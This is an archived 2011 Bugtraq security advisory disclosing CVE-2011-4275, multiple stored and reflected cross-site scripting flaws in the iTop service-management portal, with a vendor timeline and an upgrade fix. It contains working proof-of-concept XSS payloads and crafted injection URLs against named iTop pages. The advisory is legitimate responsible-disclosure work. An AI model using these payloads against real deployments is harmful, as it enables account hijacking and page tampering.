| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <00aa01cca86b$d1fc6d50$75f547f0$@tele-consulting.com>
Date: Mon, 21 Nov 2011 17:37:09 +0100 (CET)
From: "Tobias Glemser" <tglemser@...e-consulting.com>
To: <bugtraq@...urityfocus.com>
Subject: TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181
TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181
Published: 2011/11/16
Version 1.0
Affected products:
iTop version 1.1.181, 1.2.0-RC-282 (maybe earlier versions as well)
http://sourceforge.net/projects/itop/
References:
CVE-2011-4275 - Multiple web-vulnerabilities in iTop
TC-SA-2011-02 www.tele-consulting.com/advisories/TC-SA-2011-02.txt
(used for updates)
Summary:
"IT Operations Portal: a complete open source, ITIL, web based
service management tool including a fully customizable CMDB,
a helpdesk system and a document management tool."
Several common flaws could be found in iTop like reflected
and stored XSS.
Vulnerable Scripts:
stored XSS:
- almost every tested input field stored in database and in the
html-content of the site.
Especially in case data is reformatted using Javascript, the
sanitisation in place
seems to be overridden.
reflected XSS:
- almost every test input field where the value is reflected in
servers output
Examples:
stored XSS:
- add a company named "XSS <script>alert("Help Me")</script>"
- add a database server named "XSS <script>alert("Help
Me")</script>"
- import a CSV-File where one cell contains "XSS <script>alert("Help
Me")</script>"
- copy&paste data (which does the same as CSV-import) using
1;Test 1
2;Test 2
3;Test 3<script>alert("23746234243 Test")</script>"
reflected XSS (un-authenticated):
http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help
Me")</script><lala="&suggest_pwd=admin
reflected XSS (authenticated):
http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help
Me")</script><lala="&suggest_pwd=admin
http://$domain/iTop/pages/UniversalSearch.php?c[menu]="<script>alert("Help
Me")</script>"
http://$domain/iTop/pages/UI.php?c%5bmenu%5d=60&class=Note¤tId=Searc
hFormToAdd_document_list \
&description="<script>alert("Help
Me")</script>"&dosearch=1&name=Acunetix&open=1&operation=search \
_form&org_id=3&status=draft&type=contract
http://domain/iTop/pages/audit.php?category=%22%3Cscript%3Ealert%281%29%3C
/script%3E%22&operation=errors&rule=1
http://$domain/iTop/pages/UI.php?auth_user=%22%20onmouseover%3dprompt%2894
9560%29%20bad%3d%22&suggest_pwd=test
http://$domain/iTop/pages/UI.php?auth_user=admin&suggest_pwd=%22%20onmouse
over%3dprompt%28972137%29%20bad%3d%22
Possible solutions:
- use version 1.2 final
Disclosure Timeline:
2011/08/09 vendor contacted via contact@...bodo.com
2011/08/09 inital vendor response
2011/09/06 first patch by the vendor
2011/09/12 second patch by the vendor
2011/11/16 public disclosure
Credits:
Tobias Glemser (tglemser@...e-consulting.com)
Tele-Consulting security networking training GmbH, Germany
www.tele-consulting.com
Disclaimer:
All information is provided without warranty. The intent is to
provide information to secure infrastructure and/or systems, not
to be able to attack or damage. Therefore Tele-Consulting shall
not be liable for any direct or indirect damages that might be
caused by using this information.
Powered by blists - more mailing lists